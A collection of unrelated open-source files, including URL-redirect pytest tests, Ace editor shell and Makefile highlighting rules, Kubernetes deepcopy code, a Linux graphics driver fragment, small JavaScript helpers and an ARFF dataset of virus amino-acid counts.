url["base_url"] = base_url
url["location"] = f"{media_url}{url['url']}"
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize("url", LEGACY_URLS, ids=[item["url"] for item in LEGACY_URLS])
def test_legacy_urls(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", SCL3_REDIRECT_URLS, ids=[item["url"] for item in SCL3_REDIRECT_URLS]
)
def test_slc3_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", ZONE_REDIRECT_URLS, ids=[item["url"] for item in ZONE_REDIRECT_URLS]
)
def test_zone_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", MARIONETTE_URLS, ids=[item["url"] for item in MARIONETTE_URLS]
)
def test_marionette_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize("url", WEBEXT_URLS, ids=[item["url"] for item in WEBEXT_URLS])
def test_webext_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", FIREFOX_ACCOUNTS_URLS, ids=[item["url"] for item in FIREFOX_ACCOUNTS_URLS]
)
def test_firefox_accounts_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
|
{
"pile_set_name": "Github"
}
| null | null |
ace.define("ace/mode/sh_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;
var reservedKeywords = exports.reservedKeywords = (
'!|{|}|case|do|done|elif|else|'+
'esac|fi|for|if|in|then|until|while|'+
'&|;|export|local|read|typeset|unset|'+
'elif|select|set'
);
var languageConstructs = exports.languageConstructs = (
'[|]|alias|bg|bind|break|builtin|'+
'cd|command|compgen|complete|continue|'+
'dirs|disown|echo|enable|eval|exec|'+
'exit|fc|fg|getopts|hash|help|history|'+
'jobs|kill|let|logout|popd|printf|pushd|'+
'pwd|return|set|shift|shopt|source|'+
'suspend|test|times|trap|type|ulimit|'+
'umask|unalias|wait'
);
var ShHighlightRules = function() {
var keywordMapper = this.createKeywordMapper({
"keyword": reservedKeywords,
"support.function.builtin": languageConstructs,
"invalid.deprecated": "debugger"
}, "identifier");
var integer = "(?:(?:[1-9]\\d*)|(?:0))";
var fraction = "(?:\\.\\d+)";
var intPart = "(?:\\d+)";
var pointFloat = "(?:(?:" + intPart + "?" + fraction + ")|(?:" + intPart + "\\.))";
var exponentFloat = "(?:(?:" + pointFloat + "|" + intPart + ")" + ")";
var floatNumber = "(?:" + exponentFloat + "|" + pointFloat + ")";
var fileDescriptor = "(?:&" + intPart + ")";
var variableName = "[a-zA-Z_][a-zA-Z0-9_]*";
var variable = "(?:(?:\\$" + variableName + ")|(?:" + variableName + "=))";
var builtinVariable = "(?:\\$(?:SHLVL|\\$|\\!|\\?))";
var func = "(?:" + variableName + "\\s*\\(\\))";
this.$rules = {
"start" : [{
token : "constant",
regex : /\\./
}, {
token : ["text", "comment"],
regex : /(^|\s)(#.*)$/
}, {
token : "string",
regex : '"',
push : [{
token : "constant.language.escape",
regex : /\\(?:[$abeEfnrtv\\'"]|x[a-fA-F\d]{1,2}|u[a-fA-F\d]{4}([a-fA-F\d]{4})?|c.|\d{1,3})/
}, {
token : "constant",
regex : /\$\w+/
}, {
token : "string",
regex : '"',
next: "pop"
}, {
defaultToken: "string"
}]
}, {
regex : "<<<",
token : "keyword.operator"
}, {
stateName: "heredoc",
regex : "(<<-?)(\\s*)(['\"`]?)([\\w\\-]+)(['\"`]?)",
onMatch : function(value, currentState, stack) {
var next = value[2] == '-' ? "indentedHeredoc" : "heredoc";
var tokens = value.split(this.splitRegex);
stack.push(next, tokens[4]);
return [
{type:"constant", value: tokens[1]},
{type:"text", value: tokens[2]},
{type:"string", value: tokens[3]},
{type:"support.class", value: tokens[4]},
{type:"string", value: tokens[5]}
];
},
rules: {
heredoc: [{
onMatch: function(value, currentState, stack) {
if (value === stack[1]) {
stack.shift();
stack.shift();
this.next = stack[0] || "start";
return "support.class";
}
this.next = "";
return "string";
},
regex: ".*$",
next: "start"
}],
indentedHeredoc: [{
token: "string",
regex: "^\t+"
}, {
onMatch: function(value, currentState, stack) {
if (value === stack[1]) {
stack.shift();
stack.shift();
this.next = stack[0] || "start";
return "support.class";
}
this.next = "";
return "string";
},
regex: ".*$",
next: "start"
}]
}
}, {
regex : "$",
token : "empty",
next : function(currentState, stack) {
if (stack[0] === "heredoc" || stack[0] === "indentedHeredoc")
return stack[0];
return currentState;
}
}, {
token : "variable.language",
regex : builtinVariable
}, {
token : "variable",
regex : variable
}, {
token : "support.function",
regex : func
}, {
token : "support.function",
regex : fileDescriptor
}, {
token : "string", // ' string
start : "'", end : "'"
}, {
token : "constant.numeric", // float
regex : floatNumber
}, {
token : "constant.numeric", // integer
regex : integer + "\\b"
}, {
token : keywordMapper,
regex : "[a-zA-Z_][a-zA-Z0-9_]*\\b"
}, {
token : "keyword.operator",
regex : "\\+|\\-|\\*|\\*\\*|\\/|\\/\\/|~|<|>|<=|=>|=|!="
}, {
token : "paren.lparen",
regex : "[\\[\\(\\{]"
}, {
token : "paren.rparen",
regex : "[\\]\\)\\}]"
} ]
};
this.normalizeRules();
};
oop.inherits(ShHighlightRules, TextHighlightRules);
exports.ShHighlightRules = ShHighlightRules;
});
ace.define("ace/mode/makefile_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules","ace/mode/sh_highlight_rules"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;
var ShHighlightFile = require("./sh_highlight_rules");
var MakefileHighlightRules = function() {
var keywordMapper = this.createKeywordMapper({
"keyword": ShHighlightFile.reservedKeywords,
"support.function.builtin": ShHighlightFile.languageConstructs,
"invalid.deprecated": "debugger"
}, "string");
this.$rules =
{
"start": [
{
token: "string.interpolated.backtick.makefile",
regex: "`",
next: "shell-start"
},
{
token: "punctuation.definition.comment.makefile",
regex: /#(?=.)/,
next: "comment"
},
{
token: [ "keyword.control.makefile"],
regex: "^(?:\\s*\\b)(\\-??include|ifeq|ifneq|ifdef|ifndef|else|endif|vpath|export|unexport|define|endef|override)(?:\\b
|
{
"pile_set_name": "Github"
}
| null | null |
---
id: documenting-fields
title: Documenting Schema
---
Since Javadocs are not available at runtime for introspection, `graphql-kotlin-schema-generator` includes an annotation
class `@GraphQLDescription` that can be used to add schema descriptions to *any* GraphQL schema element. The string value can be in the Markdown format.
```kotlin
@GraphQLDescription("A useful widget")
data class Widget(
@GraphQLDescription("The widget's value that can be `null`")
val value: Int?
)
class WidgetQuery {
@GraphQLDescription("Creates new widget for given ID")
fun widgetById(@GraphQLDescription("The special ingredient") id: Int): Widget? = Widget(id)
}
```
The above query would produce the following GraphQL schema:
```graphql
schema {
query: Query
}
type Query {
"""Creates new widget for given ID"""
widgetById(
"""The special ingredient"""
id: Int!
): Widget
}
"""A useful widget"""
type Widget {
"""The widget's value that can be `null`"""
value: Int
}
```
|
{
"pile_set_name": "Github"
}
| null | null |
// +build !ignore_autogenerated
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by deepcopy-gen. DO NOT EDIT.
package v1beta1
import (
runtime "k8s.io/apimachinery/pkg/runtime"
)
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in ExtraValue) DeepCopyInto(out *ExtraValue) {
{
in := &in
*out = make(ExtraValue, len(*in))
copy(*out, *in)
return
}
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExtraValue.
func (in ExtraValue) DeepCopy() ExtraValue {
if in == nil {
return nil
}
out := new(ExtraValue)
in.DeepCopyInto(out)
return *out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *LocalSubjectAccessReview) DeepCopyInto(out *LocalSubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new LocalSubjectAccessReview.
func (in *LocalSubjectAccessReview) DeepCopy() *LocalSubjectAccessReview {
if in == nil {
return nil
}
out := new(LocalSubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *LocalSubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *NonResourceAttributes) DeepCopyInto(out *NonResourceAttributes) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new NonResourceAttributes.
func (in *NonResourceAttributes) DeepCopy() *NonResourceAttributes {
if in == nil {
return nil
}
out := new(NonResourceAttributes)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *NonResourceRule) DeepCopyInto(out *NonResourceRule) {
*out = *in
if in.Verbs != nil {
in, out := &in.Verbs, &out.Verbs
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.NonResourceURLs != nil {
in, out := &in.NonResourceURLs, &out.NonResourceURLs
*out = make([]string, len(*in))
copy(*out, *in)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new NonResourceRule.
func (in *NonResourceRule) DeepCopy() *NonResourceRule {
if in == nil {
return nil
}
out := new(NonResourceRule)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *ResourceAttributes) DeepCopyInto(out *ResourceAttributes) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceAttributes.
func (in *ResourceAttributes) DeepCopy() *ResourceAttributes {
if in == nil {
return nil
}
out := new(ResourceAttributes)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *ResourceRule) DeepCopyInto(out *ResourceRule) {
*out = *in
if in.Verbs != nil {
in, out := &in.Verbs, &out.Verbs
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.APIGroups != nil {
in, out := &in.APIGroups, &out.APIGroups
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.Resources != nil {
in, out := &in.Resources, &out.Resources
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.ResourceNames != nil {
in, out := &in.ResourceNames, &out.ResourceNames
*out = make([]string, len(*in))
copy(*out, *in)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceRule.
func (in *ResourceRule) DeepCopy() *ResourceRule {
if in == nil {
return nil
}
out := new(ResourceRule)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectAccessReview) DeepCopyInto(out *SelfSubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectAccessReview.
func (in *SelfSubjectAccessReview) DeepCopy() *SelfSubjectAccessReview {
if in == nil {
return nil
}
out := new(SelfSubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *SelfSubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectAccessReviewSpec) DeepCopyInto(out *SelfSubjectAccessReviewSpec) {
*out = *in
if in.ResourceAttributes != nil {
in, out := &in.ResourceAttributes, &out.ResourceAttributes
*out = new(ResourceAttributes)
**out = **in
}
if in.NonResourceAttributes != nil {
in, out := &in.NonResourceAttributes, &out.NonResourceAttributes
*out = new(NonResourceAttributes)
**out = **in
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectAccessReviewSpec.
func (in *SelfSubjectAccessReviewSpec) DeepCopy() *SelfSubjectAccessReviewSpec {
if in == nil {
return nil
}
out := new(SelfSubjectAccessReviewSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function,
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* Gets the value at `key` of `object`.
*
* @private
* @param {Object} [object] The object to query.
* @param {string} key The key of the property to get.
* @returns {*} Returns the property value.
*/
function getValue(object, key) {
return object == null ? undefined : object[key];
}
export default getValue;
|
{
"pile_set_name": "Github"
}
| null | null |
The game quantum minigolf is nearly the same as the game minigolf
- except that the ball obeys the laws of quantum mechanics.
Such a ball can be at several places at once. It can diffract around
obstacles and interfere with itself. Apart from that, the rules are
the same: You can play on various tracks involving various obstacles.
You hit the ball with a club and try to kick it into a hole on the
other side of the track.
WWW: http://quantumminigolf.sourceforge.net
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* @license
* Copyright (c) 2018 The Polymer Project Authors. All rights reserved.
* This code may only be used under the BSD style license found at
* http://polymer.github.io/LICENSE.txt
* The complete set of authors may be found at
* http://polymer.github.io/AUTHORS.txt
* The complete set of contributors may be found at
* http://polymer.github.io/CONTRIBUTORS.txt
* Code distributed by Google as part of the polymer project is also
* subject to an additional IP rights grant found at
* http://polymer.github.io/PATENTS.txt
*/
import generate from 'babel-generator';
import * as babel from 'babel-types';
import {ResolvedUrl} from 'polymer-analyzer';
import {assertIsJsDocument, getAnalysisDocument} from './analyzer-utils';
import {AssignedBundle, BundleManifest} from './bundle-manifest';
import {Bundler} from './bundler';
import {BundledJsDocument} from './document-collection';
import {getModuleExportNames, getOrSetBundleModuleExportName} from './es6-module-utils';
import {Es6Rewriter} from './es6-rewriter';
import {ensureLeadingDot, stripUrlFileSearchAndHash} from './url-utils';
/**
* Produces an ES6 Module BundledDocument.
*/
export async function bundle(
bundler: Bundler, manifest: BundleManifest, url: ResolvedUrl):
Promise<BundledJsDocument> {
const bundle = manifest.bundles.get(url);
if (!bundle) {
throw new Error(`No bundle found in manifest for url ${url}.`);
}
const assignedBundle = {url, bundle};
const generatedCode =
await prepareBundleModule(bundler, manifest, assignedBundle);
const es6Rewriter = new Es6Rewriter(bundler, manifest, assignedBundle);
const {code: rolledUpCode} = await es6Rewriter.rollup(url, generatedCode);
const document = assertIsJsDocument(
await bundler.analyzeContents(assignedBundle.url, rolledUpCode));
return {
language: 'js',
ast: document.parsedDocument.ast,
content: document.parsedDocument.contents,
files: [...assignedBundle.bundle.files]
};
}
/**
* Generate code containing import statements to all bundled modules and
* export statements to re-export their namespaces and exports.
*
* Example: a bundle containing files `module-a.js` and `module-b.js` would
* result in a prepareBundleModule result like:
*
* import * as $moduleA from './module-a.js';
* import * as $moduleB from './module-b.js';
* import $moduleBDefault from './module-b.js';
* export {thing1, thing2} from './module-a.js';
* export {thing3} from './module-b.js';
* export {$moduleA, $moduleB, $moduleBDefault};
*/
async function prepareBundleModule(
bundler: Bundler, manifest: BundleManifest, assignedBundle: AssignedBundle):
Promise<string> {
const bundleSource = babel.program([]);
const sourceAnalysis =
await bundler.analyzer.analyze([...assignedBundle.bundle.files]);
for (const resolvedSourceUrl of [...assignedBundle.bundle.files].sort()) {
const moduleDocument =
getAnalysisDocument(sourceAnalysis, resolvedSourceUrl);
const moduleExports = getModuleExportNames(moduleDocument);
const starExportName =
getOrSetBundleModuleExportName(assignedBundle, resolvedSourceUrl, '*');
bundleSource.body.push(babel.importDeclaration(
[babel.importNamespaceSpecifier(babel.identifier(starExportName))],
babel.stringLiteral(resolvedSourceUrl)));
if (moduleExports.size > 0) {
bundleSource.body.push(babel.exportNamedDeclaration(
undefined, [babel.exportSpecifier(
babel.identifier(starExportName),
babel.identifier(starExportName))]));
bundleSource.body.push(babel.exportNamedDeclaration(
undefined,
[...moduleExports].map(
(e) => babel.exportSpecifier(
babel.identifier(e),
babel.identifier(getOrSetBundleModuleExportName(
assignedBundle, resolvedSourceUrl, e)))),
babel.stringLiteral(resolvedSourceUrl)));
}
}
const {code} = generate(bundleSource);
return code;
}
|
{
"pile_set_name": "Github"
}
| null | null |
// SPDX-License-Identifier: GPL-2.0-only
/*
* Copyright © 2009 Intel Corporation
*/
#include <linux/delay.h>
#include <linux/i2c.h>
#include <linux/pm_runtime.h>
#include <drm/drm_fourcc.h>
#include "framebuffer.h"
#include "gma_display.h"
#include "power.h"
#include "psb_drv.h"
#include "psb_intel_drv.h"
#include "psb_intel_reg.h"
#define MRST_LIMIT_LVDS_100L 0
#define MRST_LIMIT_LVDS_83 1
#define MRST_LIMIT_LVDS_100 2
#define MRST_LIMIT_SDVO 3
#define MRST_DOT_MIN 19750
#define MRST_DOT_MAX 120000
#define MRST_M_MIN_100L 20
#define MRST_M_MIN_100 10
#define MRST_M_MIN_83 12
#define MRST_M_MAX_100L 34
#define MRST_M_MAX_100 17
#define MRST_M_MAX_83 20
#define MRST_P1_MIN 2
#define MRST_P1_MAX_0 7
#define MRST_P1_MAX_1 8
static bool mrst_lvds_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock);
static bool mrst_sdvo_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock);
static const struct gma_limit_t mrst_limits[] = {
{ /* MRST_LIMIT_LVDS_100L */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_100L, .max = MRST_M_MAX_100L},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_1},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_LVDS_83L */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_83, .max = MRST_M_MAX_83},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_0},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_LVDS_100 */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_100, .max = MRST_M_MAX_100},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_1},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_SDVO */
.vco = {.min = 1400000, .max = 2800000},
.n = {.min = 3, .max = 7},
.m = {.min = 80, .max = 137},
.p1 = {.min = 1, .max = 2},
.p2 = {.dot_limit = 200000, .p2_slow = 10, .p2_fast = 10},
.find_pll = mrst_sdvo_find_best_pll,
},
};
#define MRST_M_MIN 10
static const u32 oaktrail_m_converts[] = {
0x2B, 0x15, 0x2A, 0x35, 0x1A, 0x0D, 0x26, 0x33, 0x19, 0x2C,
0x36, 0x3B, 0x1D, 0x2E, 0x37, 0x1B, 0x2D, 0x16, 0x0B, 0x25,
0x12, 0x09, 0x24, 0x32, 0x39, 0x1c,
};
static const struct gma_limit_t *mrst_limit(struct drm_crtc *crtc,
int refclk)
{
const struct gma_limit_t *limit = NULL;
struct drm_device *dev = crtc->dev;
struct drm_psb_private *dev_priv = dev->dev_private;
if (gma_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)
|| gma_pipe_has_type(crtc, INTEL_OUTPUT_MIPI)) {
switch (dev_priv->core_freq) {
case 100:
limit = &mrst_limits[MRST_LIMIT_LVDS_100L];
break;
case 166:
limit = &mrst_limits[MRST_LIMIT_LVDS_83];
break;
case 200:
limit = &mrst_limits[MRST_LIMIT_LVDS_100];
break;
}
} else if (gma_pipe_has_type(crtc, INTEL_OUTPUT_SDVO)) {
limit = &mrst_limits[MRST_LIMIT_SDVO];
} else {
limit = NULL;
dev_err(dev->dev, "mrst_limit Wrong display type.\n");
}
return limit;
}
/** Derive the pixel clock for the given refclk and divisors for 8xx chips. */
static void mrst_lvds_clock(int refclk, struct gma_clock_t *clock)
{
clock->dot = (refclk * clock->m) / (14 * clock->p1);
}
static void mrst_print_pll(struct gma_clock_t *clock)
{
DRM_DEBUG_DRIVER("dotclock=%d, m=%d, m1=%d, m2=%d, n=%d, p1=%d, p2=%d\n",
clock->dot, clock->m, clock->m1, clock->m2, clock->n,
clock->p1, clock->p2);
}
static bool mrst_sdvo_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock)
{
struct gma_clock_t clock;
u32 target_vco, actual_freq;
s32 freq_error, min_error = 100000;
memset(best_clock, 0, sizeof(*best_clock));
memset(&clock, 0, sizeof(clock));
for (clock.m = limit->m.min; clock.m <= limit->m.max; clock.m++) {
for (clock.n = limit->n.min; clock.n <= limit->n.max;
clock.n++) {
for (clock.p1 = limit->p1.min;
clock.p1 <= limit->p1.max; clock.p1++) {
/* p2 value always stored in p2_slow on SDVO */
clock.p = clock.p1 * limit->p2.p2_slow;
target_vco = target * clock.p;
/* VCO will increase at this point so break */
if (target_vco > limit->vco.max)
break;
if (target_vco < limit->vco.min)
continue;
actual_freq = (refclk * clock.m) /
(clock.n * clock.p);
freq_error = 10000 -
((target * 10000) / actual_freq);
if (freq_error < -min_error)
|
{
"pile_set_name": "Github"
}
| null | null |
/*
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at
* your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* In addition, as a special exception, the author gives permission to
* link the code of this program with the Half-Life Game Engine ("HL
* Engine") and Modified Game Libraries ("MODs") developed by Valve,
* L.L.C ("Valve"). You must obey the GNU General Public License in all
* respects for all of the code used other than the HL Engine and MODs
* from Valve. If you modify this file, you may extend this exception
* to your version of the file, but you are not obligated to do so. If
* you do not wish to do so, delete this exception statement from your
* version.
*
*/
#pragma once
#define DEFINE_DECAL(name)\
{ name, 0 }
enum decal_e
{
DECAL_GUNSHOT1 = 0,
DECAL_GUNSHOT2,
DECAL_GUNSHOT3,
DECAL_GUNSHOT4,
DECAL_GUNSHOT5,
DECAL_LAMBDA1,
DECAL_LAMBDA2,
DECAL_LAMBDA3,
DECAL_LAMBDA4,
DECAL_LAMBDA5,
DECAL_LAMBDA6,
DECAL_SCORCH1,
DECAL_SCORCH2,
DECAL_BLOOD1,
DECAL_BLOOD2,
DECAL_BLOOD3,
DECAL_BLOOD4,
DECAL_BLOOD5,
DECAL_BLOOD6,
DECAL_YBLOOD1,
DECAL_YBLOOD2,
DECAL_YBLOOD3,
DECAL_YBLOOD4,
DECAL_YBLOOD5,
DECAL_YBLOOD6,
DECAL_GLASSBREAK1,
DECAL_GLASSBREAK2,
DECAL_GLASSBREAK3,
DECAL_BIGSHOT1,
DECAL_BIGSHOT2,
DECAL_BIGSHOT3,
DECAL_BIGSHOT4,
DECAL_BIGSHOT5,
DECAL_SPIT1,
DECAL_SPIT2,
DECAL_BPROOF1, // Bulletproof glass decal
DECAL_GARGSTOMP1, // Gargantua stomp crack
DECAL_SMALLSCORCH1, // Small scorch mark
DECAL_SMALLSCORCH2, // Small scorch mark
DECAL_SMALLSCORCH3, // Small scorch mark
DECAL_MOMMABIRTH, // Big momma birth splatter
DECAL_MOMMASPLAT,
DECAL_END
};
typedef struct
{
char *name;
int index;
} DLL_DECALLIST;
extern DLL_DECALLIST gDecals[DECAL_END];
|
{
"pile_set_name": "Github"
}
| null | null |
define(function() {
/**
* cssToDOM takes a kebab-case string and converts it to camelCase
* e.g. box-sizing -> boxSizing
*
* @access private
* @function cssToDOM
* @param {string} name - String name of kebab-case prop we want to convert
* @returns {string} The camelCase version of the supplied name
*/
function cssToDOM(name) {
return name.replace(/([a-z])-([a-z])/g, function(str, m1, m2) {
return m1 + m2.toUpperCase();
}).replace(/^-/, '');
}
return cssToDOM;
});
|
{
"pile_set_name": "Github"
}
| null | null |
% Datasets for `Pattern Recognition and Neural Networks' by B.D. Ripley
% =====================================================================
%
% Cambridge University Press (1996) ISBN 0-521-46086-7
%
% The background to the datasets is described in section 1.4; this file
% relates the computer-readable files to that description.
%
%
%
% Cushing's syndrome
% ------------------
%
% Data from Aitchison & Dunsmore (1975, Tables 11.1-3).
%
% Data file Cushings.dat has four columns,
%
% Label of the patient
% Tetrhydrocortisone (mg/24hr)
% Pregnanetriol (mg/24hr)
% Type
%
% The type of the last six patients (u1 to u6) should be
% regarded as unknown. (The code `o' indicates `other').
%
%
%
% synthetic two-class problem
% ---------------------------
%
% Data from Ripley (1994a).
%
% This has two real-valued co-ordinates (xs and ys) and a class (xc)
% which is 0 or 1.
%
% Data file synth.tr has 250 rows of the training set
% synth.te has 1000 rows of the test set (not used here)
%
%
%
% viruses
% -------
%
% This is a dataset on 61 viruses with rod-shaped particles affecting
% various crops (tobacco, tomato, cucumber and others) described by
% {Fauquet et al. (1988) and analysed by Eslava-G\'omez (1989). There
% are 18 measurements on each virus, the number of amino acid residues
% per molecule of coat protein.
%
% Data file viruses.dat has 61 rows of 18 counts
% virus3.dat has 38 rows corresponding to the distinct
% Tobamoviruses.
%
% The whole dataset is in order Hordeviruses (3), Tobraviruses (6),
% Tobamoviruses (39) and `furoviruses' (13).
%
%
%
% Leptograpsus crabs
% ------------------
%
% Data from Campbell & Mahon (1974) on the morphology of rock crabs of
% genus Leptograpsus.
%
% There are 50 specimens of each sex of each of two colour forms.
%
% Data file crabs.dat has rows
%
% sp `species', coded B (blue form) or O (orange form)
% sex coded M or F
% index within each group of 50
% FL frontal lip of carapace (mm)
% RW rear width of carapace (mm)
% CL length along the midline of carapace (mm)
% CW maximum width of carapace (mm)
% BD body depth (mm)
%
%
%
% Forensic glass
% --------------
%
% This example comes from forensic testing of glass collected by
% B. German on 214 fragments of glass. It is also contained in the
% UCI machine-learning database collection (Murphy & Aha, 1995).
%
% Data file fglass.dat has 214 rows with data for a single glass
% fragment.
%
% RI refractive index
% Na % weight of sodium oxide(s)
% Mg % weight of magnesium oxide(s)
% Al % weight of aluminium oxide(s)
% Si % weight of silicon oxide(s)
% K % weight of potassium oxide(s)
% Ca % weight of calcium oxide(s)
% Ba % weight of barium oxide(s)
% Fe % weight of iron oxide(s)
% type coded 1 to 7
%
% The type codes are:
%
% 1 (WinF) window float glass
% 2 (WinNF) window non-float glass
% 3 (Veh) vehicle glass
% 5 (Con) containers
% 6 (Tabl) tableware
% 7 (Head) vehicle headlamp glass
%
% The ten groups used for the cross-validation experiments (I believe)
% are listed as row numbers in the file fglass.grp,
%
%
%
% Diabetes in Pima Indians
% ------------------------
%
% A population of women who were at least 21 years old, of Pima Indian heritage
% and living near Phoenix, Arizona, was tested for diabetes
% according to World Health Organization criteria. The data
% were collected by the US National Institute of Diabetes and Digestive and
% Kidney Diseases (Smith et al, 1988). This example is also contained in the
% UCI machine-learning database collection (Murphy & Aha, 1995).
%
% The data files have rows containing
%
% npreg number of pregnancies
% glu plasma glucose concentration in an oral glucose tolerance test
% bp diastolic blood pressure (mm Hg)
% skin triceps skin fold thickness (mm)
% ins serum insulin (micro U/ml)
% bmi body mass index (weight in kg/(height in m)^2)
% ped diabetes pedigree function
% age in years
% type No / Yes
%
% Data file pima.tr has 200 rows of complete training data.
% pima.te has 332 rows of complete test data.
% pima.tr2 has the 200 rows of pima.tr plus 100 incomplete rows.
%
%
% Note: there were no column information in the data, hence the names
% were generated automatically
%
%
% Information about the dataset
% CLASSTYPE: nominal
% CLASSINDEX: none specific
%
@relation prnn-viruses
@attribute col_1 INTEGER
@attribute col_2 INTEGER
@attribute col_3 INTEGER
@attribute col_4 INTEGER
@attribute col_5 INTEGER
@attribute col_6 INTEGER
@attribute col_7 INTEGER
@attribute col_8 {0,1,2,3}
@attribute col_9 INTEGER
@attribute col_10 {0,1,2,3,4,7}
@attribute col_11 {3,4,5,6,7,8,9,10,11}
@attribute col_12 {11,12,13,14,15,16,17,18,19,21}
@attribute col_13 {4,5,6,7,8,9,12,15}
@attribute col_14 {4,5,6,7,8,9,10,11,12,14}
@attribute col_15 {0,1,2,3,4,5,6}
@attribute col_16 INTEGER
@attribute col_17 INTEGER
@attribute col_18 {0,1,2,3,4,5}
@data
25,9,9,19,12,8,20,0,10,0,6,21,8,7,4,7,17,5
26,9,9,20,13,8,20,0,10,0,6,21,8,7,4,7,17,5
25,9,9,22,10,10,23,0,13,0,6,19,5,6,4,8,16,5
15,10,21,13,18,12,22,1,9,2,4,11,5,10,1,14,8,2
